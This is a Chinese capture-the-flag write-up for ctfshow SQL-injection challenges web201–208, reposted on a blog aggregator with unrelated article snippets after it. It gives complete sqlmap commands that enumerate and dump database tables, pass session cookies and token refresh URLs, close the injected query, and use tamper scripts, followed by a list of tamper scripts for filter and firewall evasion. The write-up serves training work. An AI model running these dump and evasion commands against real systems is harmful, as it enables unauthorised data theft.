ctfshow web入门 sql注入 web201--web208

web201

先扫描先
python .\sqlmap.py -u "http://4863661d-2371-4812-ae62-128fadbdc0a4.challenge.ctf.show/api/?id=" --user-agent=sqlmap
加头
python .\sqlmap.py -u "http://4863661d-2371-4812-ae62-128fadbdc0a4.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show
枚举库
python .\sqlmap.py -u "http://4863661d-2371-4812-ae62-128fadbdc0a4.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show --dbs
枚举表
python .\sqlmap.py -u "http://4863661d-2371-4812-ae62-128fadbdc0a4.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web --tables
枚举列
python .\sqlmap.py -u "http://4863661d-2371-4812-ae62-128fadbdc0a4.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns
数据
python .\sqlmap.py -u "http://4863661d-2371-4812-ae62-128fadbdc0a4.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump

在这里插入图片描述在这里插入图片描述
是啥

web202

用data改请求方式

注意api别漏掉了,然后拼写别错,http不是https

python .\sqlmap.py -u "http://3395352c-1e86-446d-814f-d49bc02042be.challenge.ctf.show/api/index.php" --data="id=1" --user-agent=sqlmap --referer=ctf.show
python .\sqlmap.py -u "http://3395352c-1e86-446d-814f-d49bc02042be.challenge.ctf.show/api/index.php" --data="id=1" --user-agent=sqlmap --referer=ctf.show -dbs
python .\sqlmap.py -u "http://3395352c-1e86-446d-814f-d49bc02042be.challenge.ctf.show/api/index.php" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web --tables
python .\sqlmap.py -u "http://3395352c-1e86-446d-814f-d49bc02042be.challenge.ctf.show/api/index.php" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns
python .\sqlmap.py -u "http://3395352c-1e86-446d-814f-d49bc02042be.challenge.ctf.show/api/index.php" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump

web203

用method改请求方式(PUT)
python .\sqlmap.py -u "http://fb25eddc-f693-4138-8cc8-ca639d22f874.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --user-agent=sqlmap --referer=ctf.show
python .\sqlmap.py -u "http://fb25eddc-f693-4138-8cc8-ca639d22f874.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --user-agent=sqlmap --referer=ctf.show --dbs
python .\sqlmap.py -u "http://fb25eddc-f693-4138-8cc8-ca639d22f874.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web --tables
python .\sqlmap.py -u "http://fb25eddc-f693-4138-8cc8-ca639d22f874.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns
python .\sqlmap.py -u "http://fb25eddc-f693-4138-8cc8-ca639d22f874.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump

web204

很奇怪别人看cookie都是应用程序看 的我在内存看的
在这里插入图片描述
这是hackbar看到的cookie,没有的就是错误cookie就可以用hackbar
cf_clearance=twnxLak1KVHgCQpQecvcQ2eHn4Ty1zsuE1BLcEG29_M-1711783376-1.0.1.1-ptCSy07xKdkUkBdZhFZEjg.TcqAQnYo_ND6dWhksHDtXQuBzjsNtKdfNeHwvTSCAja1SPFyDWPiZINY8BBSOdQ;_ga_PP4LXQY4W0=GS1.1.1713877233.1.1.1713877940.0.0.0;_ga=GA1.2.1696768882.1713877234

错误cookie
ctfshow:"046bfa5b36c9250a53c8b0495155882d"
PHPSESSID:"oihemte7p4rs34c64h0atsblbf"
python .\sqlmap.py -u "http://4cd10d10-e0b6-4031-828e-da3c1633e456.challenge.ctf.show/api/index.php" --data="id=1"  --method=PUT --headers="Content-Type:text/plain" --cookie="PHPSESSID=oihemte7p4rs34c64h0atsblbf;ctfshow=046bfa5b36c9250a53c8b0495155882d" --user-agent=sqlmap --referer=ctf.showpython .\sqlmap.py -u "http://4cd10d10-e0b6-4031-828e-da3c1633e456.challenge.ctf.show/api/index.php" --data="id=1"  --method=PUT --headers="Content-Type:text/plain" --cookie="PHPSESSID=oihemte7p4rs34c64h0atsblbf;ctfshow=046bfa5b36c9250a53c8b0495155882d" --user-agent=sqlmap --referer=ctf.show --dbspython .\sqlmap.py -u "http://4cd10d10-e0b6-4031-828e-da3c1633e456.challenge.ctf.show/api/index.php" --data="id=1"  --method=PUT --headers="Content-Type:text/plain" --cookie="PHPSESSID=oihemte7p4rs34c64h0atsblbf;ctfshow=046bfa5b36c9250a53c8b0495155882d" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web --tablespython .\sqlmap.py -u "http://4cd10d10-e0b6-4031-828e-da3c1633e456.challenge.ctf.show/api/index.php" --data="id=1"  --method=PUT --headers="Content-Type:text/plain" --cookie="PHPSESSID=oihemte7p4rs34c64h0atsblbf;ctfshow=046bfa5b36c9250a53c8b0495155882d" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump

web205

抓包传cookie(鉴权)再sqlmap
在这里插入图片描述

cookie:
PHPSESSID=o463b8qjg024ac1t86al0uquus
python .\sqlmap.py -u "http://41ace62b-80f5-4653-96fc-62994b5bacbb.challenge.ctf.show/api/index.php" --data="id=1"  --method=PUT --headers="Content-Type:text/plain" --safe-url="http://41ace62b-80f5-4653-96fc-62994b5bacbb.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=6m26v1n6u0883a3pq5bqrg5s01" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web --tablespython .\sqlmap.py -u "http://41ace62b-80f5-4653-96fc-62994b5bacbb.challenge.ctf.show/api/index.php" --data="id=1"  --method=PUT --headers="Content-Type:text/plain" --safe-url="http://41ace62b-80f5-4653-96fc-62994b5bacbb.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=6m26v1n6u0883a3pq5bqrg5s01" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_flax --dump

web206

提示sql语句需要闭合,但是我们不需要处理,因为sqlmap可以帮忙处理
http://7be82c6c-5e57-409e-9121-db49211dcab7.challenge.ctf.show

python .\sqlmap.py -u "http://7be82c6c-5e57-409e-9121-db49211dcab7.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --safe-url="
http://7be82c6c-5e57-409e-9121-db49211dcab7.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=bomg15e8ubpnarh8pg6emun78c" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_flaxc --dump
//闭合的是这样的
python .\sqlmap.py -u "http://7be82c6c-5e57-409e-9121-db49211dcab7.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --safe-url="
http://7be82c6c-5e57-409e-9121-db49211dcab7.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=bomg15e8ubpnarh8pg6emun78c" --prefix="')" --suffix="#" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_flaxc --dump

web207

这一题过滤了空格,可以使用注释进行绕过,使用sqlmap自带的space2comment.py进行绕过:

python .\sqlmap.py -u "http://a4f6bb71-8d98-4348-9de7-1e28aa5a8174.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --safe-url="
http://a4f6bb71-8d98-4348-9de7-1e28aa5a8174.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=e18m310p77s1g4mkb5ne48j4bl" --prefix="')" --suffix="#" --user-agent=sqlmap --tamper space2comment.py --referer=ctf.show -D ctfshow_web --tablespython .\sqlmap.py -u "http://a4f6bb71-8d98-4348-9de7-1e28aa5a8174.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --safe-url="
http://a4f6bb71-8d98-4348-9de7-1e28aa5a8174.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=e18m310p77s1g4mkb5ne48j4bl" --prefix="')" --suffix="#" --user-agent=sqlmap --tamper space2comment.py --referer=ctf.show -D ctfshow_web -T ctfshow_flaxca --dump

web208

python .\sqlmap.py -u "http://2d6379a9-3588-45a9-a346-a6ea12e6e2d2.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --safe-url="
http://2d6379a9-3588-45a9-a346-a6ea12e6e2d2.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=g6i2mroj5h9ag0htvh3tkqo558" --prefix="')" --suffix="#" --user-agent=sqlmap --tamper space2comment.py,randomcase.py --referer=ctf.show -D ctfshow_web --tablespython .\sqlmap.py -u "http://2d6379a9-3588-45a9-a346-a6ea12e6e2d2.challenge.ctf.show/api/index.php" --data="id=1" --method=PUT --headers="Content-Type:text/plain" --safe-url="
http://2d6379a9-3588-45a9-a346-a6ea12e6e2d2.challenge.ctf.show/api/getToken.php" --safe-freq=1 --cookie="PHPSESSID=g6i2mroj5h9ag0htvh3tkqo558" --prefix="')" --suffix="#" --user-agent=sqlmap --tamper space2comment.py,randomcase.py --referer=ctf.show -D ctfshow_web -T ctfshow_flaxcac --dump 

常用sqlmap脚本

space2comment.py用/**/代替空格apostrophemask.py用utf8代替引号equaltolike.pylike代替等号space2dash.py 绕过过滤‘=’ 替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’n’)greatest.py 绕过过滤’>,用GREATEST替换大于号。space2hash.py空格替换为#号,随机字符串以及换行符apostrophenullencode.py绕过过滤双引号,替换字符和双引号。halfversionedmorekeywords.py当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论space2morehash.py空格替换为 #号 以及更多随机字符串 换行符appendnullbyte.py在有效负荷结束位置加载零字节字符编码ifnull2ifisnull.py 绕过对IFNULL过滤,替换类似’IFNULL(A,B)’为’IF(ISNULL(A), B, A)’space2mssqlblank.py(mssql)空格替换为其它空符号base64encode.py 用base64编码替换space2mssqlhash.py 替换空格modsecurityversioned.py过滤空格,包含完整的查询版本注释space2mysqlblank.py 空格替换其它空白符号(mysql)between.py用between替换大于号(>)space2mysqldash.py替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)multiplespaces.py围绕SQL关键字添加多个空格space2plus.py用+替换空格bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句,然后替换=likenonrecursivereplacement.py双重查询语句,取代SQL关键字space2randomblank.py代替空格字符(“”)从一个随机的空白字符可选字符的有效集sp_password.py追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾chardoubleencode.py双url编码(不处理以编码的)unionalltounion.py替换UNION ALLSELECT UNION SELECTcharencode.py url编码randomcase.py随机大小写unmagicquotes.py宽字符绕过 GPCaddslashesrandomcomments.py用/**/分割sql关键字charunicodeencode.py字符串 unicode 编码securesphere.py追加特制的字符串versionedmorekeywords.py注释绕过space2comment.py替换空格字符串(‘‘) 使用注释‘/**/’halfversionedmorekeywords.py关键字前加注释

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/6754.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

每日算法之从前序与中序遍历序列构造二叉树

题目描述 给定两个整数数组 preorder 和 inorder ,其中 preorder 是二叉树的先序遍历, inorder 是同一棵树的中序遍历,请构造二叉树并返回其根节点。 示例 1:  输入: preorder [3,9,20,15,7], inorder [9,3,15,20,7] 输出: […

央视影音 视频下载 2

浏览器猫抓插件,拿到视频地址,这个地址的播放不正常,花屏。https://dh5.cntv.qcloudcdn.com/asp/h5e/hls/2000/0303000a/3/default/6edd15a0ebb3467993bec51a95be0e22/2000.m3u8 改一下地址,把代码中的h5e去掉。网址改为https://…

Wezterm的安装和简单配置

配置文件 进入 C:\Users\xxx 目录, 创建 .wezterm.lua 配置内容 wezterm 默认用 cmd.exe, 我是 win11,希望默认用 powershell。 希望 wezterm 的主题配色,保持和 powershell 默认配色一致,也就是 Compell 主题。 目的是在频繁…

基于springboot+vue+Mysql的自习室预订系统

开发语言:Java框架:springbootJDK版本:JDK1.8服务器:tomcat7数据库:mysql 5.7(一定要5.7版本)数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包:…

【centos】vmware安装airflow流程

文章目录 1.下载系统https://mirrors.aliyun.com/centos/7/isos/x86_64/ 选择DVD20092.在VMware中,除了修改安装位置,其它选择默认安装centos73.用户名为root,登录4.网络适配器为桥接模式。5.使用命令消除显示器警告。6.安装anaconda6.1下载包&#xff1…

企业计算机服务器中了halo勒索病毒怎么处理,halo勒索病毒解密流程

随着网络技术的不断发展,网络在企业生产运营过程中发挥着重大作用,很多企业利用网络开展各项工作业务,网络也大大提高了企业的生产效率,但随之而来的网络数据安全问题成为众多企业关心的主要话题。近日,云天数据恢复中…

50个前端实战项目之04:隐藏的搜索小组件

大家好,我是宝哥。 今天讲50个前端实战项目之04:隐藏的搜索小组件。 源码下载地址 https://github.com/bradtraversy/50projects50days/tree/master/hidden-search 前端实战项目系列正在更新:04/50 01:可展开卡片02:进…

按键精灵纯本地离线文字识别插件

目的 按键精灵是一款可以模拟鼠标和键盘操作的自动化工具。它可以帮助用户自动完成一些重复的、繁琐的任务,节省大量人工操作的时间。但按键精灵是不包含图色功能,无法识别屏幕上的图像,根据图像的变化自动执行相应的操作。本篇文章主要讲解下…

Docker in Docker:深入解析与实战应用

Docker in Docker:深入解析与实战应用 一、引言 随着容器化技术的日益普及,Docker已经成为开发、测试、部署应用的标配工具。而在某些特定的场景下,如持续集成/持续部署(CI/CD)流水线中,我们可能需要在Do…

400 Bad Request问题

总结:请求路径写错了 400 问题 原地址,deleteSetmeal的参数应该改为param 更改请求地址正确后即可

靶场分享反弹shell

1、存在反弹shell命令的java代码文件Exploit.java,通过版本为1.8的jdk工具进行编译,生成Exploit.class文件 2、在存在Exploit.class文件的目录下开启http服务,让开启ldap服务端的工具marshalsec-0.0.3-SNAPSHOT-all.jar来访问这个文件 3、使用…

Spring IoCDI (1)

目录 一、IoC & DI入门 1、Spring是什么 (1)什么是容器? (2)什么是IoC? 二、IoC介绍 1、传统程序开发 2、解决方案 3、IoC程序开发 4、IoC优势 三、DI介绍 通过前面的学习,我们知…

Python语言的类和对象的基础

在 Python 中,类(class)和对象(object)是面向对象编程的核心概念。类是用来创建对象的蓝图或模板,它定义了对象的属性和方法;对象是类的实例,具有类定义的属性和方法。本文将介绍 Py…

QPS(Queries Per Second)和TPS(Transactions Per Second)的介绍和区别

QPS(Queries Per Second)和TPS(Transactions Per Second)是衡量计算系统性能的两个指标,它们分别代表了系统每秒可以处理的查询数和事务数。虽然这两个术语在某些情况下可以互换使用,但它们在技术上有所区别…

OpenCV 开源的计算机视觉和机器学习软件库

OpenCV(Open Source Computer Vision Library)是一个开源的计算机视觉和机器学习软件库,它包含了许多用于图像处理、计算机视觉和机器学习的通用算法。这个库最初由Intel开发,但现在已经成为一个全球性的社区项目,由许多贡献者共同维护和发展。 OpenCV的主要特点和优势包…

Day30:热帖排行、生成长图、将文件上传到云服务器、优化热门帖子列表、压力测试

热帖排行 不同的算分方式: 只存变化的帖子到redis中,每五分钟算一次分,定时任务 存redis 构建redis键 //统计帖子分数 //key:post:score -> value:postId public static String getPostScoreKey() {return PREFIX_POST SPLIT "…

公众号/小程序 开发模式切换

开发公众号/小程序 模式切换 https://ke.qq.com/course/6033257/14616022822424425#term_id106263577

软件架构设计模式:微服务与单体架构的比较

在软件开发领域,架构设计模式是指导如何组织应用程序代码和服务的基本方法。微服务架构和单体架构是两种常见的架构模式,它们各有优势和劣势,适用于不同的项目需求和团队结构。以下是微服务与单体架构的比较: ### 单体架构 单体…

如何进行APP下载分发?

进行APP软件分发主要涉及以下几个步骤: 准备应用程序:首先,开发人员需要确保应用程序已经经过完整的测试和质量保证,包括功能测试、用户体验测试、性能测试等,以确保其稳定性和可靠性。同时,打包应用程序&…

Redis(Jedis和SpringBoot整合Redis)

文章目录 1.Jedis1.介绍2.环境配置1.创建maven项目2.pom.xml引入依赖3.新建一个包并创建一个文件 3.Jedis远程连接到Redis1.Redis放到服务器可以连接的前提条件2.为Redis设置密码1.编辑配置文件2.找到 requirepass3.设置密码为root4.重启Redis,在shutdown的时候报错…